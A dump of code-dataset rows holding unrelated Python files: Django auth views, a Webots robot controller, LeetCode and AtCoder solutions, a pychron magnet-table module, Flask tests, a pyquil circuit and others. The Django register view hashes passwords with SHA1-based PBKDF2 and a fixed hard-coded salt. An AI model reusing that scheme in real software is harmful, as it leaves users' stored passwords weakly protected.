| no_license | jiyabing/learning | abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9 | 6059006b0f86aee9a74cfc116d2284eb44173f41 | refs/heads/master | 2020-04-02T20:47:33.025331 | 2018-10-26T05:46:10 | 2018-10-26T05:46:10 | 154,779,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,293 | py | import logging
from django.contrib import messages
from django.contrib.auth.hashers import make_password, check_password
from django.core.exceptions import ObjectDoesNotExist
from django.db import DatabaseError
from django.shortcuts import render, redirect
from userinfo.models import UserInfo
# Create your views here.
auth_check = 'abc'
def login(request):
return render(request, 'login.html')
def login_in(request):
if request.method == 'POST':
user = UserInfo()
user.name = request.POST.get('user')
user.password = request.POST.get('pwd')
try:
find_user = UserInfo.objects.filter(name=user.name)
if len(find_user) <= 0:
messages.add_message(request, messages.ERROR, '该用户未注册')
return redirect('/user/login')
if not check_password(user.password, find_user[0].password):
return render(request, 'login.html',
{'user_info': user, 'message_error': '密码错误'})
except ObjectDoesNotExist as e:
logging.warning(e)
return redirect('/')
return redirect('user/login')
def register(request):
return render(request, 'register.html')
def register_in(request):
if request.method == 'POST':
new_user = UserInfo()
new_user.name = request.POST.get('user')
if not new_user.name:
return render(request, 'register.html', {'message0': '请输入用户名'})
try:
a = UserInfo.objects.get(name=new_user.name)
if a:
return render(request, 'register.html', {'message1': '该用户已注册'})
except ObjectDoesNotExist as e:
logging.warning(e)
if request.POST.get('pwd') != request.POST.get('cpwd'):
return render(request, 'register.html', {'message2': '两次密码不一致'})
new_user.password = make_password(request.POST.get('pwd'), auth_check, 'pbkdf2_sha1')
new_user.phone = request.POST.get('phone')
new_user.email = request.POST.get('email')
try:
new_user.save()
except DatabaseError as e:
logging.warning(e)
return render(request, 'index.html')
return render(request, 'register.html') | [
"[email protected]"
]
| |
f9f4751d2e9c05ff20569e2fff730457d677e304 | 57fc5d54f5df359c7a53020fb903f36479d3a322 | /controllers/.history/robot/robot_20201214160008.py | 046d51ee297654183bab7c9b7fcbfad4b3fd37f5 | []
| no_license | shenwuyue-xie/webots_testrobots | 929369b127258d85e66c5275c9366ce1a0eb17c7 | 56e476356f3cf666edad6449e2da874bb4fb4da3 | refs/heads/master | 2023-02-02T11:17:36.017289 | 2020-12-20T08:22:59 | 2020-12-20T08:22:59 | 323,032,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py |
from controller import Robot
from controller import Connector
from controller import Motor
from controller import DistanceSensor
from controller import Device
from controller import PositionSensor
import numpy as np
from deepbots.robots.controllers.robot_emitter_receiver_csv import \
RobotEmitterReceiverCSV
import math
class TaskDecisionRobot(RobotEmitterReceiverCSV):
def __init__(self):
super(TaskDecisionRobot,self).__init__()
self.name = self.robot.getName()
self.timestep = int(self.robot.getBasicTimeStep())
self.setupsensors()
self.setupmotors()
self.robot.batterySensorEnable(self.timestep)
def normalize_to_range(self,value, min, max, newMin, newMax):
value = float(value)
min = float(min)
max = float(max)
newMin = float(newMin)
newMax = float(newMax)
return (newMax - newMin) / (max - min) * (value - max) + newMax
def setupsensors(self):
self.distancesensors = []
if self.name == "0":
self.n_distancesensors = 7
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
else :
self.n_distancesensors = 4
self.frontconnector = self.robot.getConnector("front_connector")
self.rearconnector = self.robot.getConnector("rear_connector")
self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
for i in range(self.n_distancesensors):
self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
self.distancesensors[i].enable(self.timestep)
def setupmotors(self):
self.leftmotor= self.robot.getMotor('left_motor')
self.rightmotor= self.robot.getMotor('right_motor')
self.frontmotor = self.robot.getMotor('front_motor')
self.rearmotor = self.robot.getMotor('rear_motor')
self.leftmotor.setPosition(float('inf'))
self.rightmotor.setPosition(float('inf'))
self.leftmotor.setVelocity(0)
self.rightmotor.setVelocity(0)
self.rearpositionsensor = self.rearmotor.getPositionSensor()
self.rearpositionsensor.enable(self.timestep)
def create_message(self):
message = []
for distancesensor in self.distancesensors:
message.append(distancesensor.getValue())
return message
def use_message_data(self,message):
for i in range(2):
if float(message[i]) <0:
message[i] = self.normalize_to_range(float(message[i]),-0.1,0,-8,-4)
if float(message[i]) >= 0:
message[i] = self.normalize_to_range(float(message[i]),0,1.1,6,12)
for j in range(2,14):
# message[i] = float(message[i])
# x = np.random.uniform(0,1,12)
message[j] = self.normalize_to_range(float(message[j]),-0.1,1.1,0,1)
if message [i] >= 0 and message[i] <= 0.3:
message[i] = 0
elif message [i] > 0.4 and message [i] <= 0.7:
message[i] = 0
elif message [i] > 0.8 and message[i] <= 1:
message[i] = 0
elif message[i] > 0.7 and message[i] <= 0.8:
message[i] = self.normalize_to_range(message[i],0.7,0.8,0,math.pi/2)
elif message[i] > 0.3 and message[i] <= 0.4:
message[i] = self.normalize_to_range(message[i],0,0.1,-math.pi/2,0)
self.leftmotor.setVelocity(message[0])
self.rightmotor.setVelocity(message[1])
self.frontmotor.setPosition(message[int(self.name) * 2 + 2])
self.rearmotor.setPosition(message[int(self.name) * 2 + 3])
controller = TaskDecisionRobot()
controller.run()
| [
"[email protected]"
]
| |
25ebc6477404f30e4e15e869ae2e7bd4a932b605 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /problems/0092.0_Reverse_Linked_List_II.py | f76687c1bb1a3916b824b332406fc4c4f57eb438 | []
| no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,197 | py | '''
I do it only in one pass.
T: O(N)
S: O(1)
Runtime: 64 ms, faster than 13.84% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 13.9 MB, less than 87.01% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
if left == right:
return head
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
'''
no need to check left == right
Runtime: 65 ms, faster than 12.39% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 14.2 MB, less than 18.38% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
hair = ListNode(next=head)
node = hair
for _ in range(left - 1):
node = node.next
# node.next -> start
start = tail = node.next
another = None
for _ in range(right - left + 1):
nxt = start.next
start.next = another
another = start
start = nxt
# link tail to trailing nodes
tail.next = start
# link heading-nodes to another
node.next = another
return hair.next
| [
"[email protected]"
]
| |
07576f9b3eec4640fe26ba3cef131645dcdf2a17 | 4b52336c8e5251c759a28d60635cbf8a66615c07 | /scripts/metrical_error.py | 70b487d57b58382d9077b6cd3c9f92c796e0d464 | []
| no_license | sanskrit-kosha/kosha | f51d8681be0dc8a6a9c9656cec446dc03875a1a0 | 39b90ae9265ab1d7408f889a12092788432eb2fb | refs/heads/master | 2023-04-30T02:46:59.005799 | 2023-04-10T05:00:29 | 2023-04-10T05:00:29 | 189,419,853 | 24 | 13 | null | 2020-12-19T08:24:12 | 2019-05-30T13:35:09 | HTML | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tries to identify verses with imperfect meters from given file.
Prerequisites:
Put metrical_error.py file in shreevatsa/sanskrit folder.
Put the input_file to be checked for metrical inconsistencies
Usage from commandline:
python metrical_error.py input_file
python metrical_error.py input_file > log.txt
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import sys
import codecs
import identifier_pipeline
if __name__ == '__main__':
# Set logging level.
logging.getLogger().setLevel(logging.WARNING)
# create identifier class.
identifier = identifier_pipeline.IdentifierPipeline()
# input file.
filein = sys.argv[1]
# Read input file.
fin = codecs.open(filein, 'r', 'utf-8')
# Initialize empty verse.
verse = ''
# For each line,
for line in fin:
# Ignore lines starting with semicolon. Process others.
if not line.startswith(';'):
# Add to verse.
verse += line
# Double danda denotes end of verse. Start identifying meter.
if '॥' in line:
# print(verse)
# Identify meter.
identifier.IdentifyFromText(verse)
# Extract debug information.
debug_info = identifier.AllDebugOutput()
# for perfect match, raise no error.
if 'exact match' in debug_info:
pass
# Else print the verse and associated debug information.
else:
print(verse.encode('utf-8'))
print(debug_info.encode('utf-8'))
# Reset verse to blank
verse = ''
| [
"[email protected]"
]
| |
2f51c5475b8174f1d1cfa288a854afb39d686511 | f9ff85c981942d15c65d37de107e0c5fa5e6a2ba | /pychron/spectrometer/mftable.py | 085dbbfca92bed2e7d4d14971e5b55e235bea6a1 | [
"Apache-2.0"
]
| permissive | kenlchen/pychron | 0c729f1b1973b9883734007b7a318fe21669e6c1 | ffd988e27ae09fb3e8a8790d87ff611557911d07 | refs/heads/master | 2021-01-24T21:53:42.293554 | 2016-04-04T07:18:39 | 2016-04-04T07:18:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,980 | py | # ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import HasTraits, List, Str, Dict, Float, Bool, Property, cached_property
from traitsui.api import View, Controller, TableEditor, UItem
# from traitsui.table_column import ObjectColumn
# ============= standard library imports ========================
import shutil
import csv
import os
import hashlib
from numpy import asarray, array, nonzero
from scipy.optimize import leastsq
# ============= local library imports ==========================
from pychron.core.helpers.filetools import add_extension
from pychron.loggable import Loggable
from pychron.paths import paths
from pychron.spectrometer import set_mftable_name, get_mftable_name
def get_detector_name(det):
if not isinstance(det, (str, unicode)):
det = det.name
return det
def mass_cal_func(p, x):
return p[0]*x**2+p[1]*x+p[2]
def least_squares(func, xs, ys, initial_guess):
xs, ys = asarray(xs), asarray(ys)
errfunc = lambda p, x, v: func(p, x) - v
ret, info = leastsq(errfunc, initial_guess, args=(xs, ys))
return ret
class FieldItem(HasTraits):
isotope = Str
def to_csv(self, keys, fmt):
return [self.isotope] + [fmt(getattr(self, k)) for k in keys]
class MagnetFieldTable(Loggable):
"""
map a voltage to a mass
"""
items = List
molweights = Dict
_mftable = None
_detectors = None
db = None
spectrometer_name = Str
use_local_archive = Bool
use_db_archive = Bool
path = Property
def __init__(self, *args, **kw):
super(MagnetFieldTable, self).__init__(*args, **kw)
# p = paths.mftable
# if not os.path.isfile(p):
# self.warning_dialog('No Magnet Field Table. Create {}'.format(p))
# else:
# self.load_mftable()
# if os.environ.get('RTD', 'False') == 'False':
self.bind_preferences()
def initialize(self, molweights):
self.molweights = molweights
# p = paths.mftable
p = self.path
if not os.path.isfile(p):
self.warning_dialog('No Magnet Field Table. Create {}'.format(p))
else:
self.load_mftable(load_items=True)
def bind_preferences(self):
from apptools.preferences.preference_binding import bind_preference
prefid = 'pychron.spectrometer'
bind_preference(self, 'use_local_archive',
'{}.use_local_mftable_archive'.format(prefid))
bind_preference(self, 'use_db_archive',
'{}.use_db_mftable_archive'.format(prefid))
def get_dac(self, det, isotope):
det = get_detector_name(det)
d = self._get_mftable()
isos, xs, ys = map(array, d[det][:3])
refindex = min(nonzero(isos == isotope)[0])
return ys[refindex]
def update_field_table(self, det, isotope, dac, message):
"""
dac needs to be in axial units
"""
det = get_detector_name(det)
self.info('update mftable {} {} {} message={}'.format(det, isotope, dac, message))
d = self._get_mftable()
isos, xs, ys = map(array, d[det][:3])
try:
refindex = min(nonzero(isos == isotope)[0])
delta = dac - ys[refindex]
# need to calculate all ys
# using simple linear offset
# ys += delta
for k, (iso, xx, yy, _) in d.iteritems():
ny = yy + delta
p = least_squares(mass_cal_func, xx, ny, [ny[0], xx[0], 0])
d[k] = iso, xx, ny, p
self.dump(isos, d, message)
# self._mftable = isos, xs, ys
except ValueError:
import traceback
e = traceback.format_exc()
self.debug('Magnet update field table {}'.format(e))
def set_path_name(self, name):
if self.path != self._name_to_path(name):
self.path = name
self.info('Using MFTable {}'.format(self.path))
self.load_mftable()
def get_table(self):
mt = self._get_mftable()
return mt
def load(self):
pass
def save(self):
detectors = self._detectors
p = self.path
p = '{}.temp'.format(p)
fmt = lambda x: '{:0.5f}'.format(x)
with open(p, 'w') as f:
writer = csv.writer(f)
writer.writerow(['iso'] + detectors)
for fi in self.items:
writer.writerow(fi.to_csv(detectors, fmt))
self._set_mftable_hash(p)
self._add_to_archive(p, message='manual modification')
def dump(self, isos, d, message):
detectors = self._detectors
p = self.path
with open(p, 'w') as f:
writer = csv.writer(f)
writer.writerow(['iso'] + detectors)
for i, iso in enumerate(isos):
a = [iso]
for hi in detectors:
iso, xs, ys, _ = d[hi]
a.append('{:0.5f}'.format(ys[i]))
writer.writerow(a)
self._set_mftable_hash(p)
self._add_to_archive(p, message)
# @property
# def mftable_path(self):
# return os.path.join(paths.spectrometer_dir, 'mftable.csv')
@property
def mftable_archive_path(self):
return os.path.join(paths.spectrometer_dir,
'{}_mftable_archive'.format(self.spectrometer_name))
def load_mftable(self, load_items=False):
"""
mftable format- first line is a header followed by
Isotope, Dac_i, Dac_j,....
Dac_i is the magnet dac setting to center Isotope on detector i
example::
iso, H2, H1, AX, L1, L2, CDD
Ar40,5.78790,5.895593,6.00675,6.12358,6.24510,6.35683
Ar39,5.89692,5.788276,5.89692,5.89692,5.89692,5.89692
Ar36,5.56072,5.456202,5.56072,5.56072,5.56072,5.56072
"""
p = self.path
self.debug('Using mftable located at {}'.format(p))
mws = self.molweights
self._set_mftable_hash(p)
items = []
with open(p, 'U') as f:
reader = csv.reader(f)
table = []
detectors = map(str.strip, reader.next()[1:])
for line in reader:
iso = line[0]
try:
mw = mws[iso]
except KeyError, e:
self.warning('"{}" not in molweights {}'.formamolweights(iso, mw))
continue
dacs = map(float, line[1:])
if load_items:
fi = FieldItem(isotope=iso)
for di, v in zip(detectors, dacs):
fi.add_trait(di, Float(v))
items.append(fi)
row = [iso, mw] + dacs
table.append(row)
self._report_mftable(detectors, items)
self.items = items
table = zip(*table)
isos, mws = list(table[0]), list(table[1])
d = {}
for i, k in enumerate(detectors):
ys = table[2 + i]
try:
c = least_squares(mass_cal_func, mws, ys, [ys[0], mws[0], 0])
except TypeError:
c = (0, 1, ys[0])
d[k] = (isos, mws, ys, c)
self._mftable = d
# self._mftable={k: (isos, mws, table[2 + i], )
# for i, k in enumerate(detectors)}
self._detectors = detectors
def _report_mftable(self, detectors, items):
self.debug('============ MFtable ===========')
self.debug('{:<8s} {}'.format('Isotope', ''.join(['{:<7s}'.format(di) for di in detectors])))
for it in items:
vs = ['{:0.4f}'.format(getattr(it, di)) for di in detectors]
self.debug('{:<8s} {}'.format(it.isotope, ' '.join(vs)))
self.debug('================================')
def _get_mftable(self):
if not self._mftable or not self._check_mftable_hash():
self.load_mftable()
return self._mftable
def _check_mftable_hash(self):
"""
return True if mftable externally modified
"""
# p = paths.mftable
current_hash = self._make_hash(self.path)
return self._mftable_hash != current_hash
def _make_hash(self, p):
with open(p, 'U') as rfile:
return hashlib.md5(rfile.read())
def _set_mftable_hash(self, p):
self._mftable_hash = self._make_hash(p)
def _add_to_archive(self, p, message):
if self.use_db_archive:
if self.db:
self.info('db archiving mftable')
with open(p, 'r') as rfile:
self.db.add_mftable(self.spectrometer_name, rfile.read())
else:
self.debug('no db instance available for archiving')
if self.use_local_archive:
try:
from pychron.git_archive.git_archive import GitArchive
except ImportError:
self.warning('GitPython >=0.3.2RC1 required for local MFTable Archiving')
return
archive = GitArchive(self.mftable_archive_path)
# copy
dest = os.path.join(self.mftable_archive_path, os.path.basename(p))
shutil.copyfile(p, dest)
archive.add(dest, msg=message)
archive.close()
self.info('locally archiving mftable')
def _set_path(self, name):
set_mftable_name(name)
@cached_property
def _get_path(self):
name = get_mftable_name()
return os.path.join(paths.mftable_dir, add_extension(name, '.csv'))
# def _name_to_path(self, name):
# if name:
# name = os.path.join(paths.mftable_dir, add_extension(name, '.csv'))
# return name or ''
#
# def _set_path(self, v):
# self._path = self._name_to_path(v)
#
# def _get_path(self):
# if self._path:
# p = self._path
# else:
# p = paths.mftable
# return p
# ============= EOF =============================================
| [
"[email protected]"
]
| |
c18b3cb7ee53ef6f4e57c84b67f7d88e779e289e | 65f14cce454ac723c74f70b5d39cdc1a58b6a91b | /test.py | c46fdab8e3a52e9e967ba3e0471969553358af18 | []
| no_license | wagolemusa/FlaskAPis | d9d2b81d4a8520d0f79bf476e6e9d0f8a655d6bf | d916b04a962e72a9142a75d7fc53840fbcfec422 | refs/heads/master | 2020-03-23T15:02:00.408224 | 2018-10-15T15:14:57 | 2018-10-15T15:14:57 | 141,716,049 | 0 | 0 | null | 2018-10-10T16:53:05 | 2018-07-20T13:33:59 | Python | UTF-8 | Python | false | false | 1,829 | py | from app import app
import unittest
class FlaskTestCase(unittest.TestCase):
#Ensure that flask was sett up correctly
def test_index(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertEqual(response.status_code, 200)
# Ensure that login page loads correctly
def test_login_page_loads(self):
tester = app.test_client(self)
response = tester.get('/login', content_type='html/text')
self.assertFalse(b'Please try again.' in response.data)
# Ensure that login correctly
def test_correct_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'You are just login', response.data)
# Test Wrong credentails
def test_incorrect_login(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="wrong", password="wrong"),
follow_redirects=True
)
self.assertIn(b'Invalid credentials. Please try again', response.data)
# test loggout
def test_logout(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'You were just Logged out', response.data)
#Ensure that main page requires login
def test_main_route_requires_login(self):
tester = app.test_client(self)
response = tester.get('/', follow_redirects=True)
self.assertTrue(b'You need to first Login', response.data)
def test_post_show_up(self):
tester = app.test_client(self)
response = tester.post(
'/login',
data=dict(username="admin", password="admin"),
follow_redirects=True
)
self.assertIn(b'Im well', response.data)
if __name__ =='__main__':
unittest.main() | [
"[email protected]"
]
| |
bf161dacfe80fdf84648076044416621060b7549 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008/programming/libs/openexr/actions.py | bbb492342c23594450270c0a93e02d0fe4894b4b | []
| no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
autotools.configure("--enable-shared \
--enable-imfexamples \
--enable-imffuzztest \
--disable-static")
def build():
autotools.make()
def install():
# documents and examples go to "/usr/share/OpenEXR" without these parameters
docdir = "/usr/share/doc/%s" % get.srcTAG()
examplesdir = "%s/examples" % docdir
autotools.rawInstall("DESTDIR=%s docdir=%s examplesdir=%s" % (get.installDIR(), docdir, examplesdir))
pisitools.dodoc("AUTHORS", "ChangeLog","NEWS", "README","LICENSE")
| [
"[email protected]"
]
| |
7625a749cac98b120e763c7d4acf51ac35d00eba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2055.py | 8182827470465e78a48300f2e0b4bb6f4b4b58b2 | [
"BSD-3-Clause"
]
| permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | # qubit number=4
# total number=30
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=12
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += CNOT(1,0) # number=13
prog += H(0) # number=15
prog += CZ(1,0) # number=16
prog += H(1) # number=20
prog += H(2) # number=19
prog += H(0) # number=27
prog += CZ(3,0) # number=28
prog += H(0) # number=29
prog += Z(3) # number=25
prog += CNOT(3,0) # number=26
prog += H(0) # number=17
prog += CNOT(2,0) # number=21
prog += X(1) # number=23
prog += CNOT(2,0) # number=22
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2055.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
]
| |
a630382faf9954faa047953a9d9cd71b7f3b32ca | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/Artificial-Intelligence-with-Python/Chapter 08/visualization1.py | 87c3154afcfd82ddb65576615f5100e38768a547 | [
"MIT"
]
| permissive | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 3,652 | py | #!/usr/bin/python
import numpy as np
import matplotlib.pyplot as plt
from deap import algorithms, base, benchmarks, \
cma, creator, tools
# Function to create a toolbox
def create_toolbox(strategy):
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", list, fitness=creator.FitnessMin)
toolbox = base.Toolbox()
toolbox.register("evaluate", benchmarks.rastrigin)
# Seeed the random number generator
np.random.seed(7)
toolbox.register("generate", strategy.generate, creator.Individual)
toolbox.register("update", strategy.update)
return toolbox
if __name__ == "__main__":
# Problem size
num_individuals = 10
num_generations = 125
# Create a strategy using CMA-ES algorithm
strategy = cma.Strategy(centroid=[5.0]*num_individuals, sigma=5.0,
lambda_=20*num_individuals)
# Create toolbox based on the above strategy
toolbox = create_toolbox(strategy)
# Create hall of fame object
hall_of_fame = tools.HallOfFame(1)
# Register the relevant stats
stats = tools.Statistics(lambda x: x.fitness.values)
stats.register("avg", np.mean)
stats.register("std", np.std)
stats.register("min", np.min)
stats.register("max", np.max)
logbook = tools.Logbook()
logbook.header = "gen", "evals", "std", "min", "avg", "max"
# Objects that will compile the data
sigma = np.ndarray((num_generations, 1))
axis_ratio = np.ndarray((num_generations, 1))
diagD = np.ndarray((num_generations, num_individuals))
fbest = np.ndarray((num_generations,1))
best = np.ndarray((num_generations, num_individuals))
std = np.ndarray((num_generations, num_individuals))
for gen in range(num_generations):
# Generate a new population
population = toolbox.generate()
# Evaluate the individuals
fitnesses = toolbox.map(toolbox.evaluate, population)
for ind, fit in zip(population, fitnesses):
ind.fitness.values = fit
# Update the strategy with the evaluated individuals
toolbox.update(population)
# Update the hall of fame and the statistics with the
# currently evaluated population
hall_of_fame.update(population)
record = stats.compile(population)
logbook.record(evals=len(population), gen=gen, **record)
print(logbook.stream)
# Save more data along the evolution
sigma[gen] = strategy.sigma
axis_ratio[gen] = max(strategy.diagD)**2/min(strategy.diagD)**2
diagD[gen, :num_individuals] = strategy.diagD**2
fbest[gen] = hall_of_fame[0].fitness.values
best[gen, :num_individuals] = hall_of_fame[0]
std[gen, :num_individuals] = np.std(population, axis=0)
# The x-axis will be the number of evaluations
x = list(range(0, strategy.lambda_ * num_generations, strategy.lambda_))
avg, max_, min_ = logbook.select("avg", "max", "min")
plt.figure()
plt.semilogy(x, avg, "--b")
plt.semilogy(x, max_, "--b")
plt.semilogy(x, min_, "-b")
plt.semilogy(x, fbest, "-c")
plt.semilogy(x, sigma, "-g")
plt.semilogy(x, axis_ratio, "-r")
plt.grid(True)
plt.title("blue: f-values, green: sigma, red: axis ratio")
plt.figure()
plt.plot(x, best)
plt.grid(True)
plt.title("Object Variables")
plt.figure()
plt.semilogy(x, diagD)
plt.grid(True)
plt.title("Scaling (All Main Axes)")
plt.figure()
plt.semilogy(x, std)
plt.grid(True)
plt.title("Standard Deviations in All Coordinates")
plt.show()
| [
"[email protected]"
]
| |
46d714e2d63f7b3970e142a75ec299f3918e24ab | 849e95a72f4f380d6b31573a0a13e9eccd288838 | /legal-api/src/legal_api/services/filings/validations/conversion.py | d532b344ec36b6abb0179a0ec37385fccec37ac1 | [
"Apache-2.0"
]
| permissive | bcgov/lear | d9b27e2b44ba607ca13878357a62a0623d54ddee | d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32 | refs/heads/main | 2023-09-01T11:26:11.058427 | 2023-08-31T20:25:24 | 2023-08-31T20:25:24 | 168,396,249 | 13 | 117 | Apache-2.0 | 2023-09-14T20:52:02 | 2019-01-30T18:49:09 | Python | UTF-8 | Python | false | false | 1,951 | py | # Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Conversion filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.common_validations import validate_name_request
from legal_api.services.filings.validations.registration import validate_offices, validate_party
from ...utils import get_str
def validate(business: Business, filing: Dict) -> Optional[Error]:
"""Validate the Conversion filing."""
filing_type = 'conversion'
if not filing:
return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
legal_type_path = '/filing/business/legalType'
legal_type = get_str(filing, legal_type_path)
if legal_type in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
msg = []
if filing.get('filing', {}).get('conversion', {}).get('nameRequest', None):
msg.extend(validate_name_request(filing, legal_type, filing_type))
msg.extend(validate_party(filing, legal_type, filing_type))
msg.extend(validate_offices(filing, filing_type))
if msg:
return Error(HTTPStatus.BAD_REQUEST, msg)
return None
| [
"[email protected]"
]
| |
1229ce4e6ef1de8ce673b6a08aec76352a73ec7f | 2d5171ac7f2640ed73b48aebf4b96e29d5cad818 | /AtcoderProblems/LevelB/147.py | 9b710ddb2985d2bdea5c4d8cb3a478461ada6650 | []
| no_license | kentahoriuchi/Atcorder | d7b8308424175f32d47f24bb15303695780e1611 | f6449d4e9dc7d92210497e3445515fe95b74c659 | refs/heads/master | 2023-06-06T09:26:46.963642 | 2021-06-13T15:08:04 | 2021-06-13T15:08:04 | 255,396,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | N = int(input())
S = list(input())
if N%2 == 1:
print('No')
else:
if S[:N//2] == S[N//2:]:
print('Yes')
else:
print('No') | [
"[email protected]"
]
| |
a56c399efd1cab8fbdc97c65e235972bc8b8e467 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/osrg_ryu/ryu-master/ryu/services/protocols/zebra/server/zserver.py | f8119900253ae75bddf8f893620262895bc073fe | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 11,033 | py | # Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
